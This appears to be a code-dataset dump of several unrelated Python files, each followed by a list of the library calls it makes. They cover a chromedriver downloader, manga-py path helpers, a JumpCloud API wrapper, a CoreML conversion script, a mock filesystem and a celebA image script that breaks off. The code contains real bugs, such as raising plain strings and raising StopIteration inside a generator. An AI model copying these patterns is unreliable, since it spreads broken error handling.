        self.ut.log_message("INFO", "Environment: " + os_name)
        self.ut.log_message("INFO", "Architecture Type: " + arch_type)
        url = self.url_builder(os_extension)
        self.ut.log_message("INFO", "Downloading the required binary for chromedriver")
        self.ut.driver_downloader(url, dir_path)
        self.ut.log_message("INFO", "Download completed")
        self.ut.unzip_file('dir_chromedriver/')
        self.ut.log_message("INFO", "Unarchiving contents completed")

    def download_driver(self):
        """Create the chromedriver directory and fetch the binary.

        Skips the download (with an informational message) when the directory
        already exists.
        """
        dir_path = self.ut.get_driver_path("/dependencies/dir_chromedriver")
        if os.path.exists(dir_path):
            self.ut.log_message(
                "INFO",
                "chrome driver is already present. To update chromedriver please run `flexibox update --driver=chromedriver`"
            )
        else:
            os.makedirs(dir_path)
            os_name = self.ot.os_name()
            arch_type = str(self.ot.os_architecture())
            self.evaluate_on_environment(os_name, arch_type)

    def update_driver(self):
        """Replace an existing chromedriver binary with the latest release."""
        self.ut.check_directory_content("/dependencies/dir_chromedriver/chromedriver")
        self.ut.log_message("INFO", "Deleting directory contents")
        self.ut.delete_dir_contents('dir_chromedriver/')
        os_name = self.ot.os_name()
        arch_type = str(self.ot.os_architecture())
        self.evaluate_on_environment(os_name, arch_type)
        self.ut.log_message("INFO", "chromedriver updated")
| [
"os.path.exists",
"flexibox.core.utility.Utility",
"flexibox.utility.os_type.OS_type",
"os.makedirs",
"requests.get",
"flexibox.core.logger.Logger"
] | [((513, 522), 'flexibox.core.utility.Utility', 'Utility', ([], {}), '()\n', (520, 522), False, 'from flexibox.core.utility import Utility\n'), ((541, 550), 'flexibox.utility.os_type.OS_type', 'OS_type', ([], {}), '()\n', (548, 550), False, 'from flexibox.utility.os_type import OS_type\n'), ((570, 578), 'flexibox.core.logger.Logger', 'Logger', ([], {}), '()\n', (576, 578), False, 'from flexibox.core.logger import Logger\n'), ((1509, 1545), 'requests.get', 'requests.get', (["data['latest_release']"], {}), "(data['latest_release'])\n", (1521, 1545), False, 'import requests\n'), ((3489, 3513), 'os.path.exists', 'os.path.exists', (['dir_path'], {}), '(dir_path)\n', (3503, 3513), False, 'import os\n'), ((3738, 3759), 'os.makedirs', 'os.makedirs', (['dir_path'], {}), '(dir_path)\n', (3749, 3759), False, 'import os\n')] |
import tempfile
from os import name as os_name, getpid
from pathlib import Path
import json
__dir_name = '.manga-py'
def get_temp_path(*args) -> str:
    """
    Returns the path of the temporary files manga-py
    :param args:
    :return:
    """
    per_process_dir = 'temp_%s' % getpid()
    return path_join(tempfile.gettempdir(), __dir_name, per_process_dir, *args)
def root_path() -> str:
    """
    Returns the root of the installation path manga-py
    :return:
    """
    # Two levels up from this module's resolved location.
    return str(Path(__file__).resolve().parent.parent)
def get_util_home_path() -> str:
    """
    Returns the root path of the system files manga-py
    :return:
    """
    if os_name == 'nt':
        # Windows keeps per-user app data under AppData\Roaming.
        parts = ('AppData', 'Roaming', __dir_name)
    else:
        parts = (__dir_name,)
    home = path_join(str(Path.home()), *parts)
    make_dirs(home)
    return str(home)
def make_dirs(_path: str):
    """Create *_path* and any missing parents; an existing directory is fine."""
    target = Path(_path)
    target.mkdir(parents=True, exist_ok=True)
def remove_query(name: str) -> str:
    """Strip a URL query string from a file name.

    Returns ``'image.png'`` when the name is nothing but a query (starts with
    ``'?'``), the part before the first ``'?'`` when one is present, and the
    name unchanged when there is no query at all.

    :param name: file name, possibly followed by ``?query=...``
    :return: the cleaned file name
    """
    position = name.find('?')
    if position == 0:
        return 'image.png'
    if position > 0:
        return name[:position]
    # Bug fix: find() returns -1 when no '?' exists; the old name[:position]
    # silently dropped the last character of every query-free name.
    return name
def is_file(_path: str) -> bool:
    """Return True when *_path* names an existing regular file."""
    target = Path(_path)
    return target.is_file()
def is_dir(_path: str) -> bool:
    """Return True when *_path* names an existing directory."""
    target = Path(_path)
    return target.is_dir()
def basename(_path: str) -> str:
    """Return the final path component of *_path*."""
    final_component = Path(_path).name
    return str(final_component)
def dirname(_path: str) -> str:
    """Return the parent directory of *_path* as a string."""
    parent_dir = Path(_path).parent
    return str(parent_dir)
def path_join(_path, *args) -> str:
    """Join *_path* with *args* and return the combined path as a string."""
    joined = Path(_path).joinpath(*args)
    return str(joined)
def unlink(_path: str):
    """Delete *_path*: rmdir for an empty directory, unlink for a file."""
    target = Path(_path)
    if is_dir(_path):
        target.rmdir()
    if is_file(_path):
        target.unlink()
def os_stat(_path: str):
    """Return ``Path.stat()`` for *_path*, or None when it is not a file."""
    if not is_file(_path):
        return None
    return Path(_path).stat()
def file_size(_path: str):
    """Return the size of *_path* in bytes, or -1 when it is not a file."""
    stat_result = os_stat(_path)
    return -1 if stat_result is None else stat_result.st_size
def rename(_from: str, _to: str):
    """Rename the filesystem entry *_from* to *_to*."""
    source = Path(_from)
    source.rename(_to)
def storage(_path: str):
    """
    Return the absolute path of *_path* inside the manga-py storage area,
    creating the parent directory when needed.

    :param _path: path relative to the storage root
    :return: absolute path under ``<home>/storage``
    """
    full_path = path_join(get_util_home_path(), 'storage', _path)
    make_dirs(dirname(full_path))
    return full_path
def walk(_path: str) -> tuple:
    """
    Split the direct children of *_path* into directories and files.

    :param _path:
    :return: tuple(resolved_path, [dir Paths], [file Paths])
    """
    target = Path(_path)
    children = list(target.iterdir())
    directories = [child for child in children if child.is_dir()]
    regular_files = [child for child in children if child.is_file()]
    return target.resolve(), directories, regular_files
def listing(_path: str) -> dict:
    """
    :param _path:
    :return: {'directories': (,), 'files': (,)}
    """
    _, directories, files = walk(_path)
    return {'directories': directories, 'files': files}
def __get_info(_path: str, result: dict):
    """Read ``info.json`` under *_path* (when present) into ``result[_path]``."""
    info_file = path_join(_path, 'info.json')
    if not is_file(info_file):
        return
    with open(info_file, 'r') as handle:
        result[_path] = json.loads(handle.read())
def get_info(_path: str) -> dict:
    """
    listing subdirectories and reading info.json files
    :param _path:
    :return:
    """
    result = {}
    for sub_dir in listing(_path)['directories']:
        __get_info(path_join(_path, sub_dir), result)
    return result
| [
"pathlib.Path.home",
"tempfile.gettempdir",
"os.getpid",
"pathlib.Path"
] | [((2269, 2280), 'pathlib.Path', 'Path', (['_path'], {}), '(_path)\n', (2273, 2280), False, 'from pathlib import Path\n'), ((275, 283), 'os.getpid', 'getpid', ([], {}), '()\n', (281, 283), False, 'from os import name as os_name, getpid\n'), ((305, 326), 'tempfile.gettempdir', 'tempfile.gettempdir', ([], {}), '()\n', (324, 326), False, 'import tempfile\n'), ((475, 489), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (479, 489), False, 'from pathlib import Path\n'), ((895, 906), 'pathlib.Path', 'Path', (['_path'], {}), '(_path)\n', (899, 906), False, 'from pathlib import Path\n'), ((1162, 1173), 'pathlib.Path', 'Path', (['_path'], {}), '(_path)\n', (1166, 1173), False, 'from pathlib import Path\n'), ((1229, 1240), 'pathlib.Path', 'Path', (['_path'], {}), '(_path)\n', (1233, 1240), False, 'from pathlib import Path\n'), ((1300, 1311), 'pathlib.Path', 'Path', (['_path'], {}), '(_path)\n', (1304, 1311), False, 'from pathlib import Path\n'), ((1367, 1378), 'pathlib.Path', 'Path', (['_path'], {}), '(_path)\n', (1371, 1378), False, 'from pathlib import Path\n'), ((1859, 1870), 'pathlib.Path', 'Path', (['_from'], {}), '(_from)\n', (1863, 1870), False, 'from pathlib import Path\n'), ((708, 719), 'pathlib.Path.home', 'Path.home', ([], {}), '()\n', (717, 719), False, 'from pathlib import Path\n'), ((795, 806), 'pathlib.Path.home', 'Path.home', ([], {}), '()\n', (804, 806), False, 'from pathlib import Path\n'), ((1440, 1451), 'pathlib.Path', 'Path', (['_path'], {}), '(_path)\n', (1444, 1451), False, 'from pathlib import Path\n'), ((1525, 1536), 'pathlib.Path', 'Path', (['_path'], {}), '(_path)\n', (1529, 1536), False, 'from pathlib import Path\n'), ((1576, 1587), 'pathlib.Path', 'Path', (['_path'], {}), '(_path)\n', (1580, 1587), False, 'from pathlib import Path\n'), ((1662, 1673), 'pathlib.Path', 'Path', (['_path'], {}), '(_path)\n', (1666, 1673), False, 'from pathlib import Path\n')] |
# -*- coding: utf-8 -*-
"""
.. currentmodule:: jccli.jc_api_v1.py
.. moduleauthor:: zaro0508 <<EMAIL>>
This is a utility library for the jumpcloud version 1 api
.. note::
To learn more about the jumpcloud api 1
`project website <https://github.com/TheJumpCloud/jcapi-python/tree/master/jcapiv1>`_.
"""
from distutils.util import strtobool
import jcapiv1
from jcapiv1 import Systemuserput
from jcapiv1.rest import ApiException
from jccli.errors import SystemUserNotFoundError
from jccli.helpers import class_to_dict
# pylint: disable=too-many-arguments
class JumpcloudApiV1:
"""
Wrapper for Jumpcloud API v1
"""
def __init__(self, api_key):
configuration = jcapiv1.Configuration()
configuration.api_key['x-api-key'] = api_key
self.system_users_api = jcapiv1.SystemusersApi(jcapiv1.ApiClient(configuration))
self.search_api = jcapiv1.SearchApi(jcapiv1.ApiClient(configuration))
def retrieve_users(self, user_ids=[]):
"""
Retrieve a list of users corresponding to ids
"""
# FIXME: This is not an ideal way to do this, but search_systemusers_post doesn't seem to allow filtering on ID
all_users = self.get_users()
return [user for user in all_users if user['id'] in user_ids]
def search_users(self, filter={}):
"""
Search for users on jumpcloud.
:param filter: (dict) an object used to filter search results for various fields. E.g.: `{"firstname": "David"}`
:return:
"""
query_filter = {'and': []}
for field, value in filter.items():
query_filter['and'].append({field: value})
if not filter:
query_filter = None
try:
api_response = self.search_api.search_systemusers_post(
content_type='application/json',
accept='application/json',
body={
'filter': query_filter
}
)
users = [user.to_dict() for user in api_response.results]
return users
except ApiException as error:
raise "Exception when calling SystemusersApi->systemusers_list: %s\n" % error
def get_users(self, limit='100', skip=0, search='', filter='', sort='', fields=''):
"""
Get users from jumpcloud
:param limit:
:param skip:
:param search:
:param filter:
:param sort:
:param fields:
:return: a list of users with dict of settings
"""
try:
api_response = self.system_users_api.systemusers_list(content_type='application/json',
accept='application/json',
limit=limit,
skip=skip,
sort=sort,
fields=fields,
x_org_id='',
search=search,
filter=filter)
users = [user.to_dict() for user in class_to_dict(api_response.results)]
return users
except ApiException as error:
raise "Exception when calling SystemusersApi->systemusers_list: %s\n" % error
def create_user(self, systemuser):
"""
Create a new user in jumpcloud
:param systemuser: a dictoionary of Systemuser properties
https://github.com/TheJumpCloud/jcapi-java/blob/master/jcapiv1/docs/Systemuser.md
:return: The api response
"""
body = jcapiv1.Systemuserputpost(username=systemuser['username'],
email=systemuser['email'],
firstname=systemuser.get('firstname', ''),
lastname=systemuser.get('lastname', ''),
allow_public_key=strtobool(
systemuser.get('allow_public_key', 'True')),
ldap_binding_user=strtobool(
systemuser.get('ldap_binding_user', 'False')),
passwordless_sudo=strtobool(
systemuser.get('passwordless_sudo', 'False')),
sudo=strtobool(systemuser.get('sudo', 'False')))
try:
api_response = self.system_users_api.systemusers_post(content_type='application/json',
accept='application/json',
body=body,
x_org_id='')
return api_response.to_dict()
except ApiException as error:
# FIXME: What should this behavior actually be?
raise Exception("Exception when calling SystemusersApi->systemusers_post: %s\n" % error)
def delete_user(self, username):
"""
Delete a user from jumpcloud
:param id: The jumpcloud id of the user
:return:
"""
user_id = self.get_user_id(username)
if user_id is None:
raise SystemUserNotFoundError(f"System user {username} not found")
try:
api_response = self.system_users_api.systemusers_delete(user_id,
content_type='application/json',
accept='application/json',
x_org_id='')
return api_response
except ApiException as error:
raise "Exception when calling SystemusersApi->systemusers_post: %s\n" % error
def get_user_id(self, username):
"""
Get the jumpcloud user id from the user name
:param username
:return: the user id
"""
users = self.get_users(limit='', fields="username")
for user in users:
if user['username'] == username:
return user['id']
raise SystemUserNotFoundError('No user found for username: %s' % (username,))
def get_user(self, username):
"""
Get detail view of a user object.
:param user_id:
:return: user properties dict
"""
# FIXME: As soon as we figure out how the `filter` parameter works on systemusers_list(), we should start
# filtering based on username
users = self.system_users_api.systemusers_list(
accept='application/json',
content_type='application/json'
).results
for user in users:
if user.username == username:
return user.to_dict()
raise SystemUserNotFoundError('No user found for username: %s' % (username,))
def set_user(self, username, attributes):
user_id = self.get_user_id(username)
api_response = self.system_users_api.systemusers_put(
accept='application/json',
content_type='application/json',
id=user_id,
body=Systemuserput(**attributes)
)
return api_response.to_dict()
| [
"jccli.helpers.class_to_dict",
"jcapiv1.Systemuserput",
"jcapiv1.ApiClient",
"jcapiv1.Configuration",
"jccli.errors.SystemUserNotFoundError"
] | [((699, 722), 'jcapiv1.Configuration', 'jcapiv1.Configuration', ([], {}), '()\n', (720, 722), False, 'import jcapiv1\n'), ((6528, 6599), 'jccli.errors.SystemUserNotFoundError', 'SystemUserNotFoundError', (["('No user found for username: %s' % (username,))"], {}), "('No user found for username: %s' % (username,))\n", (6551, 6599), False, 'from jccli.errors import SystemUserNotFoundError\n'), ((7196, 7267), 'jccli.errors.SystemUserNotFoundError', 'SystemUserNotFoundError', (["('No user found for username: %s' % (username,))"], {}), "('No user found for username: %s' % (username,))\n", (7219, 7267), False, 'from jccli.errors import SystemUserNotFoundError\n'), ((831, 863), 'jcapiv1.ApiClient', 'jcapiv1.ApiClient', (['configuration'], {}), '(configuration)\n', (848, 863), False, 'import jcapiv1\n'), ((909, 941), 'jcapiv1.ApiClient', 'jcapiv1.ApiClient', (['configuration'], {}), '(configuration)\n', (926, 941), False, 'import jcapiv1\n'), ((5588, 5648), 'jccli.errors.SystemUserNotFoundError', 'SystemUserNotFoundError', (['f"""System user {username} not found"""'], {}), "(f'System user {username} not found')\n", (5611, 5648), False, 'from jccli.errors import SystemUserNotFoundError\n'), ((7547, 7574), 'jcapiv1.Systemuserput', 'Systemuserput', ([], {}), '(**attributes)\n', (7560, 7574), False, 'from jcapiv1 import Systemuserput\n'), ((3360, 3395), 'jccli.helpers.class_to_dict', 'class_to_dict', (['api_response.results'], {}), '(api_response.results)\n', (3373, 3395), False, 'from jccli.helpers import class_to_dict\n')] |
# See documentation for more details
# https://apple.github.io/coremltools/generated/coremltools.converters.keras.convert.html
import coremltools
from keras.models import model_from_json
from keras.models import load_model
# load model and weights
#json_file = open('keras_model.json', 'r')
#loaded_model_json = json_file.read()
#json_file.close()
#model = model_from_json(loaded_model_json)
#model.load_weights("keras_mnist_model.h5")
model = load_model('keras_mnist_model.h5')
# convert to .mlmodel
keras_model = coremltools.converters.keras.convert(model,
input_names='image (28x28)',
image_input_names='image (28x28)',
output_names = ['prediction'],
class_labels=['0', '1', '2', '3', '4', '5', '6', '7', '8', '9'])
keras_model.author = '<NAME>'
keras_model.license = 'nope'
keras_model.short_description = 'Predicts a handwritten digit'
keras_model.save('my_mnist.mlmodel')
| [
"keras.models.load_model",
"coremltools.converters.keras.convert"
] | [((446, 480), 'keras.models.load_model', 'load_model', (['"""keras_mnist_model.h5"""'], {}), "('keras_mnist_model.h5')\n", (456, 480), False, 'from keras.models import load_model\n'), ((518, 727), 'coremltools.converters.keras.convert', 'coremltools.converters.keras.convert', (['model'], {'input_names': '"""image (28x28)"""', 'image_input_names': '"""image (28x28)"""', 'output_names': "['prediction']", 'class_labels': "['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']"}), "(model, input_names='image (28x28)',\n image_input_names='image (28x28)', output_names=['prediction'],\n class_labels=['0', '1', '2', '3', '4', '5', '6', '7', '8', '9'])\n", (554, 727), False, 'import coremltools\n')] |
"""mockfs: A simple mock filesystem for unit tests."""
import copy
import errno
import fnmatch
import glob
import os
import shutil
import sys
from . import compat
from . import util
# Python functions to replace
# Maps dotted names to the real stdlib callables; the originals stay
# reachable through this dict (presumably so they can be restored after a
# test run -- confirm against the patching code, which is outside this chunk).
builtins = {
    'glob.glob': glob.glob,
    'os.chdir': os.chdir,
    'os.getcwd': os.getcwd,
    'os.path.abspath': os.path.abspath,
    'os.path.exists': os.path.exists,
    'os.path.getsize': os.path.getsize,
    'os.path.islink': os.path.islink,
    'os.path.isdir': os.path.isdir,
    'os.path.isfile': os.path.isfile,
    'os.walk': os.walk,
    'os.listdir': os.listdir,
    'os.makedirs': os.makedirs,
    'os.remove': os.remove,
    'os.rmdir': os.rmdir,
    'os.unlink': os.unlink,
    'shutil.rmtree': shutil.rmtree,
}

# On python2.x also replace os.getcwdu
if compat.PY2:
    builtins['os.getcwdu'] = os.getcwdu

# We use the original abspath()
_abspath_builtin = builtins['os.path.abspath']
def _OSError(err, path):
"""Return an OSError with an appropriate error string"""
return OSError(err, os.strerror(err) + ": '%s'" % path)
def _IOError(err, path):
"""Return an IOError with an appropriate error string"""
return IOError(err, os.strerror(err) + ": '%s'" % path)
class StorageBackend(object):
    """File-storage adapter that delegates to a MockFS instance."""

    def __init__(self, mfs):
        self.mfs = mfs

    def CheckForFile(self, filename):
        """Return True when *filename* exists in the mock filesystem."""
        return self.mfs.exists(filename)

    def DeleteFile(self, filename):
        """Remove *filename* from the mock filesystem."""
        self.mfs.remove(filename)

    def LoadFile(self, filename):
        """Return the stored contents of *filename*."""
        return self.mfs.read(filename)

    def SaveFile(self, filename, data):
        """Store *data* at *filename*; the parent directory must exist."""
        parent_dir = os.path.dirname(self.mfs.abspath(filename))
        if not self.mfs.exists(parent_dir):
            raise _IOError(errno.ENOENT, filename)
        self.mfs.add_entries({filename: data})
class MockFS(object):
"""
MockFS implementation object
Provides stubs for functions in :mod:`os`, :mod:`os.path`, and :mod:`glob`.
"""
def __init__(self):
self.cwd = Cwd(self)
self.backend = StorageBackend(self)
self._entries = {}
def add_entries(self, entries):
"""Add new entries to mockfs."""
new_entries = util.build_nested_dict(entries)
util.merge_dicts(new_entries, self._entries)
def exists(self, path):
"""
Return True if path exists
Implements the :func:`os.path.exists` interface.
"""
path = self.abspath(path)
dirent = self._direntry(os.path.dirname(path))
if path == '/':
return bool(dirent)
return bool(dirent) and os.path.basename(path) in dirent
def getsize(self, path):
"""Return the size of a file, reported by os.stat()."""
entry = self._direntry(path)
if entry is None:
raise _OSError(errno.ENOENT, path)
return len(entry)
def read(self, path):
path = self.abspath(path)
dirname = os.path.dirname(path)
basename = os.path.basename(path)
entry = self._direntry(dirname)
if not util.is_dir(entry):
raise _OSError(errno.EPERM, path)
try:
return entry[basename]
except KeyError:
raise _OSError(errno.ENOENT, path)
def isdir(self, path):
"""
Return True if path is a directory
Implements the :func:`os.path.isdir` interface.
"""
return util.is_dir(self._direntry(path))
def isfile(self, path):
"""
Return True if path is a file
Implements the :func:`os.path.isfile` interface.
"""
return util.is_file(self._direntry(path))
def islink(self, path):
"""
Return True if path is a symlink
.. note::
Currently hard-wired to return False
"""
return False
def makedirs(self, path):
"""Create directory entries for a path
Raise OSError if the path already exists.
"""
path = self.abspath(path)
entry = self._direntry(path)
if entry is not None:
raise _OSError(errno.EEXIST, path)
new_entries = util.build_nested_dir_dict(path)
util.merge_dicts(new_entries, self._entries)
def abspath(self, path):
if os.path.isabs(path):
# Folds '////' into '/'
return _abspath_builtin(path)
curdir = self.cwd.getcwd()
return _abspath_builtin(os.path.join(curdir, path))
def listdir(self, path):
"""
Return the directory contents of 'path'
Implements the :func:`os.listdir` interface.
:param path: filesystem path
"""
direntry = self._direntry(path)
if direntry is None:
raise _OSError(errno.ENOENT, path)
if util.is_file(direntry):
raise _OSError(errno.ENOTDIR, path)
if util.is_dir(direntry):
return list(sorted(direntry.keys()))
raise _OSError(errno.EINVAL, path)
def walk(self, path):
"""
Walk a filesystem path
Implements the :func:`os.walk` interface.
"""
path = self.abspath(path)
inspect = [path]
while True:
dirstack = []
for entry in inspect:
dirent = self._direntry(entry)
dirs = []
files = []
if dirent:
for e in dirent:
if type(dirent[e]) is dict:
dirs.append(e)
else:
files.append(e)
yield (entry, dirs, files)
dirstack.extend([os.path.join(entry, d) for d in dirs])
inspect = dirstack
if not inspect:
raise StopIteration
def remove(self, path):
"""Remove the entry for a file path
Implements the :func:`os.remove` interface.
"""
path = self.abspath(path)
dirname = os.path.dirname(path)
basename = os.path.basename(path)
entry = self._direntry(dirname)
if not util.is_dir(entry):
raise _OSError(errno.EPERM, path)
try:
fsentry = entry[basename]
except KeyError:
raise _OSError(errno.ENOENT, path)
if not util.is_file(fsentry):
raise _OSError(errno.EPERM, path)
del entry[basename]
def rmdir(self, fspath):
"""Remove the entry for a directory path
Implements the :func:`os.rmdir` interface.
"""
path = self.abspath(fspath)
dirname = os.path.dirname(path)
basename = os.path.basename(path)
entry = self._direntry(dirname)
if not util.is_dir(entry):
raise _OSError(errno.ENOENT, path)
try:
direntry = entry[basename]
except KeyError:
raise _OSError(errno.ENOENT, fspath)
if not util.is_dir(direntry):
raise _OSError(errno.ENOTDIR, fspath)
if len(direntry) != 0:
raise _OSError(errno.ENOTEMPTY, fspath)
del entry[basename]
def copytree(self, src, dst):
"""Copy a directory subtree
Implements the :func:`shutil.copytree` interface.
"""
src_d = self._direntry(src)
if src_d is None:
raise _OSError(errno.ENOENT, src)
dst = self.abspath(dst)
dst_d_parent = self._direntry(os.path.dirname(dst))
dst_d_parent[os.path.basename(dst)] = copy.deepcopy(src_d)
def rmtree(self, path, ignore_errors=False, onerror=None):
"""Recursively delete a directory tree.
If ignore_errors is set, errors are ignored; otherwise, if onerror
is set, it is called to handle the error with arguments (func,
path, exc_info) where func is os.listdir, os.remove, or os.rmdir;
path is the argument to that function that caused it to fail; and
exc_info is a tuple returned by sys.exc_info(). If ignore_errors
is false and onerror is None, an exception is raised.
"""
abspath = self.abspath(path)
if abspath == '/':
# Do not allow removing the root
if ignore_errors:
return
if onerror:
onerror(os.listdir, path, sys.exc_info())
return
raise _OSError(errno.EPERM, '/')
entry = self._direntry(abspath)
if entry is None:
if ignore_errors:
return
if onerror:
onerror(os.listdir, path, sys.exc_info())
return
raise _OSError(errno.ENOENT, entry)
if not self.isdir(path):
if ignore_errors:
return
if onerror:
onerror(os.rmdir, path, sys.exc_info())
return
raise _OSError(errno.ENOTDIR, path)
dirname = os.path.dirname(abspath)
dirent = self._direntry(dirname)
if dirent is None:
if ignore_errors:
return
if onerror:
onerror(os.listdir, path, sys.exc_info())
return
raise _OSError(errno.ENOENT, dirname)
basename = os.path.basename(path)
if basename not in dirent:
if ignore_errors:
return
if onerror:
onerror(os.rmdir, path, sys.exc_info())
return
raise _OSError(errno.ENOENT, path)
# Remove the directory
del dirent[basename]
    def glob(self, pattern):
        """Implementation of :py:func:`glob.glob`.

        Matches *pattern* against the in-memory tree one path component at
        a time.  Relative patterns are resolved against the current working
        directory and the results are returned relative to it; absolute
        patterns yield absolute paths.
        """
        # Keep relative glob paths relative
        if os.path.isabs(pattern):
            prefix = None
        else:
            # Remember the cwd prefix so it can be stripped from results.
            prefix = self.cwd.getcwd()
            if prefix != '/':
                prefix += '/'
        pattern = self.abspath(pattern)
        if pattern == '/':
            return ['/']
        # Keep track of current likely candidate paths.
        # Each time we filter down, take the new candidates
        # and append their names to create new candidates paths.
        patterns = pattern.split('/')[1:]
        entries = [('', self._entries)]
        match = fnmatch.fnmatch
        path_stack = []
        pattern_stack = ['']
        paths = []
        for idx, subpattern in enumerate(patterns):
            # Extend the pattern by one component and test every child of
            # every surviving candidate directory against it.
            pattern_stack.append(subpattern)
            pattern = '/'.join(pattern_stack)
            new_entries = []
            new_paths = []
            for subdir, entry in entries:
                path_stack.append(subdir)
                for path in sorted(entry):
                    path_stack.append(path)
                    abspath = '/'.join(path_stack)
                    if match(abspath, pattern):
                        new_entries.append((abspath, entry[path]))
                        new_paths.append(abspath)
                    path_stack.pop()
                path_stack.pop()
            entries = new_entries
            paths = new_paths
        if prefix is None:
            return paths
        else:
            # Strip the cwd prefix to keep relative results relative.
            return [p[len(prefix) :] for p in paths]
# Internal Methods
def _direntry(self, fspath):
"""Return the directory "dict" entry for a path"""
path = self.abspath(fspath)
if path == '/':
return self._entries
elts = path.split('/')[1:]
current = self._entries
retval = None
for elt in elts:
if elt in current:
retval = current[elt]
current = current[elt]
else:
return None
return retval
class Cwd(object):
    """Current-working-directory tracker for an in-memory filesystem."""
    def __init__(self, mfs):
        # mfs: the owning in-memory filesystem, used to resolve paths.
        self._cwd = '/'
        self._mfs = mfs
    def chdir(self, path):
        """Change the current directory to *path* (absolute or relative)."""
        # Make it absolute
        if os.path.isabs(path):
            cdpath = path
        else:
            cdpath = os.path.join(self._cwd, path)
        # NOTE(review): the existence check resolves `path`, not `cdpath`;
        # this relies on the filesystem's abspath() resolving relative paths
        # against this cwd -- confirm the two always agree.
        entry = self._mfs._direntry(path)
        if entry is None:
            raise _OSError(errno.ENOENT, path)
        elif not util.is_dir(entry):
            raise _OSError(errno.ENOTDIR, path)
        # _abspath_builtin presumably normalizes '.'/'..' components -- TODO confirm.
        self._cwd = _abspath_builtin(cdpath)
    def getcwd(self):
        """Return the current working directory as a string."""
        return self._cwd
    def getcwdu(self):
        """Return the same value as getcwd() (os.getcwdu-style alias)."""
        return self._cwd
| [
"os.path.isabs",
"os.path.join",
"os.path.dirname",
"sys.exc_info",
"os.path.basename",
"copy.deepcopy",
"os.strerror"
] | [((1636, 1662), 'os.path.dirname', 'os.path.dirname', (['full_path'], {}), '(full_path)\n', (1651, 1662), False, 'import os\n'), ((2951, 2972), 'os.path.dirname', 'os.path.dirname', (['path'], {}), '(path)\n', (2966, 2972), False, 'import os\n'), ((2992, 3014), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\n', (3008, 3014), False, 'import os\n'), ((4284, 4303), 'os.path.isabs', 'os.path.isabs', (['path'], {}), '(path)\n', (4297, 4303), False, 'import os\n'), ((6004, 6025), 'os.path.dirname', 'os.path.dirname', (['path'], {}), '(path)\n', (6019, 6025), False, 'import os\n'), ((6045, 6067), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\n', (6061, 6067), False, 'import os\n'), ((6625, 6646), 'os.path.dirname', 'os.path.dirname', (['path'], {}), '(path)\n', (6640, 6646), False, 'import os\n'), ((6666, 6688), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\n', (6682, 6688), False, 'import os\n'), ((7529, 7549), 'copy.deepcopy', 'copy.deepcopy', (['src_d'], {}), '(src_d)\n', (7542, 7549), False, 'import copy\n'), ((8948, 8972), 'os.path.dirname', 'os.path.dirname', (['abspath'], {}), '(abspath)\n', (8963, 8972), False, 'import os\n'), ((9269, 9291), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\n', (9285, 9291), False, 'import os\n'), ((9729, 9751), 'os.path.isabs', 'os.path.isabs', (['pattern'], {}), '(pattern)\n', (9742, 9751), False, 'import os\n'), ((11860, 11879), 'os.path.isabs', 'os.path.isabs', (['path'], {}), '(path)\n', (11873, 11879), False, 'import os\n'), ((1034, 1050), 'os.strerror', 'os.strerror', (['err'], {}), '(err)\n', (1045, 1050), False, 'import os\n'), ((1182, 1198), 'os.strerror', 'os.strerror', (['err'], {}), '(err)\n', (1193, 1198), False, 'import os\n'), ((2498, 2519), 'os.path.dirname', 'os.path.dirname', (['path'], {}), '(path)\n', (2513, 2519), False, 'import os\n'), ((4450, 4476), 'os.path.join', 'os.path.join', (['curdir', 'path'], {}), '(curdir, path)\n', (4462, 
4476), False, 'import os\n'), ((7461, 7481), 'os.path.dirname', 'os.path.dirname', (['dst'], {}), '(dst)\n', (7476, 7481), False, 'import os\n'), ((7504, 7525), 'os.path.basename', 'os.path.basename', (['dst'], {}), '(dst)\n', (7520, 7525), False, 'import os\n'), ((11942, 11971), 'os.path.join', 'os.path.join', (['self._cwd', 'path'], {}), '(self._cwd, path)\n', (11954, 11971), False, 'import os\n'), ((2609, 2631), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\n', (2625, 2631), False, 'import os\n'), ((8334, 8348), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (8346, 8348), False, 'import sys\n'), ((8604, 8618), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (8616, 8618), False, 'import sys\n'), ((8842, 8856), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (8854, 8856), False, 'import sys\n'), ((9160, 9174), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (9172, 9174), False, 'import sys\n'), ((9444, 9458), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (9456, 9458), False, 'import sys\n'), ((5679, 5701), 'os.path.join', 'os.path.join', (['entry', 'd'], {}), '(entry, d)\n', (5691, 5701), False, 'import os\n')] |
import os
from skimage.transform import resize
import imageio
import numpy as np
import glob
import scipy
def main():
    """Walk the identity folders under *rootdir* and save each identity's
    high-resolution test images as PNGs under
    face_recognition_srgan_test/<identity>/.
    """
    rootdir = "/home/nbayat5/Desktop/celebA/identities"
    #os.mkdir("/home/nbayat5/Desktop/celebA/face_recognition_srgan")
    for subdir, dirs, files in os.walk(rootdir):
        for dir in dirs:
            # NOTE(review): `dir` is never used below -- `path` is built from
            # `subdir`, so every iteration of this inner loop sees the same
            # path.  Presumably os.path.join(subdir, dir) was intended; confirm.
            path = os.path.join(rootdir, subdir)
            parts = path.split("/")
            if len(parts) == 6:
                # Six components == the root path itself (no identity part).
                continue
            os.mkdir("/home/nbayat5/Desktop/celebA/face_recognition_srgan_test/%s" % (parts[6].rstrip()))
            imgs_hr, imgs_lr = load_dataforIdentities(path)
            counter = 1
            for img in imgs_hr:
                # fake_hr = gan.generator.predict(img_lr) #fix for loop to lr
                # Undo the [-1, 1] normalization applied by load_dataforIdentities.
                img = 0.5 * img + 0.5
                img = np.asarray(img)
                path_hr = "/home/nbayat5/Desktop/celebA/face_recognition_srgan_test/%s/%s_%d.png" % (
                    parts[6].rstrip(), parts[6].rstrip(), counter)
                imageio.imwrite(path_hr, img)
                print("img %s_%d.png saved." % (parts[6].rstrip(), counter))
                counter += 1
        break  # Only the first os.walk() level is processed.
def load_dataforIdentities(path):
    """Load the test images of one identity folder.

    Reads every ``test/*.jpg`` under *path* and produces paired
    high-resolution (64x64) and low-resolution (16x16) versions, each
